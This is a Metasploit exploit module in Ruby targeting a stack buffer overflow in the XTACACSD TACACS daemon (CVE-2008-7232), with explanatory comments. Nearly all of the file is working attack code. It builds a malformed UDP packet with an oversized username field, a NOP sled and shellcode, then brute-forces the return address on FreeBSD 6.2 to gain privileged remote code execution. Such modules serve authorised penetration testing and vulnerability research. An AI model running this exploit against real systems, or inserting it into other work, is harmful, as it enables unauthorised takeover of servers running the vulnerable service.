##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Metasploit exploit module for the XTACACSD report() stack buffer
  # overflow (CVE-2008-7232). The saved return address is not known
  # exactly, so the Brute mixin drives #brute_exploit once per candidate
  # address in the 'Bruteforce' range declared on the target below.
  Rank = AverageRanking

  include Msf::Exploit::Remote::Udp # connect_udp / udp_sock / disconnect_udp
  include Msf::Exploit::Brute       # invokes #brute_exploit for each candidate

  # Registers the module metadata (name, references, payload constraints,
  # target and bruteforce range, operator notes) and the default UDP port.
  #
  # @param info [Hash] extra module info merged in by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'XTACACSD report() Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in XTACACSD <= 4.1.2. By
          sending a specially crafted XTACACS packet with an overly long
          username, an attacker may be able to execute arbitrary code.
        },
        'Author' => 'MC',
        'References' => [
          ['CVE', '2008-7232'],
          ['OSVDB', '58140'],
          ['URL', 'http://aluigi.altervista.org/adv/xtacacsdz-adv.txt'],
        ],
        # Payload constraints: at most 175 bytes, must avoid NUL and the
        # listed whitespace bytes, and is prefixed with "\x83\xec\x7f"
        # (sub esp, 0x7f) — presumably to move the stack pointer off the
        # region the payload occupies. DisableNops: the NOP sled is built
        # explicitly in #brute_exploit rather than by the framework.
        'Payload' => {
          'Space' => 175,
          'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20",
          'StackAdjustment' => -3500,
          'PrependEncoder' => "\x83\xec\x7f",
          'DisableNops' => true
        },
        'Platform' => 'bsd',
        'Arch' => ARCH_X86,
        # Single target: the return address is stepped from 0xbfbfea00 to
        # 0xbfbfef00 in increments of 24; each value reaches #brute_exploit
        # as address['Ret'].
        'Targets' => [
          [
            'FreeBSD 6.2-Release Bruteforce',
            {
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0xbfbfea00 },
                'Stop' => { 'Ret' => 0xbfbfef00 },
                'Step' => 24
              }
            },
          ],
        ],
        'Privileged' => true,
        'DefaultTarget' => 0,
        'DisclosureDate' => '2008-01-08',
        # Operator notes: the module declares that the service crashes and
        # restarts, that a session is repeatable, and that attempts leave
        # entries in the target's logs.
        'Notes' => {
          'Stability' => [ CRASH_SERVICE_RESTARTS, ],
          'Reliability' => [ REPEATABLE_SESSION, ],
          'SideEffects' => [ IOC_IN_LOGS, ]
        }
      )
    )

    register_options([Opt::RPORT(49)]) # default remote port 49 (TACACS)
  end

  # Sends a single exploit attempt for one candidate return address. Called
  # by the Brute mixin once per step of the 'Bruteforce' range above.
  #
  # The datagram is a fixed XTACACS header (field meanings in the trailing
  # comments), then a NOP sled, the encoded payload and the candidate
  # return address. The sled is sized so that sled + payload total exactly
  # 238 bytes, keeping the return address at a constant offset regardless
  # of payload length ('Space' => 175 keeps the subtraction positive).
  #
  # @param address [Hash] current bruteforce position; only 'Ret' is read
  # @return [void]
  def brute_exploit(address)
    connect_udp

    sploit = "\x80" # Version
    sploit << "\x05" # Type: Connect
    sploit << "\xff\xff" # Nonce
    sploit << "\xff" # Username length (0xff: the oversized value that triggers the overflow)
    sploit << "\x00" # Password length
    sploit << "\x00" # Response
    sploit << "\x00" # Reason
    sploit << "\xff\xff\xff\xff" # Result 1
    sploit << "\xff\xff\xff\xff" # Destination address
    sploit << "\xff\xff" # Destination port
    sploit << "\xff\xff" # Line
    sploit << "\x00\x00\x00\x00" # Result 2
    sploit << "\x00\x00" # Result 3
    sploit << make_nops(238 - payload.encoded.length) # pad sled so sled + payload == 238 bytes
    sploit << payload.encoded + [address['Ret']].pack('V') # Ret as 32-bit little-endian

    print_status("Trying target #{target.name} #{'%.8x' % address['Ret']}...")
    udp_sock.put(sploit) # one datagram per attempt; no reply is read here

    # NOTE(review): if udp_sock.put raises, disconnect_udp is skipped; an
    # ensure block would guarantee the socket is released.
    disconnect_udp
  end
end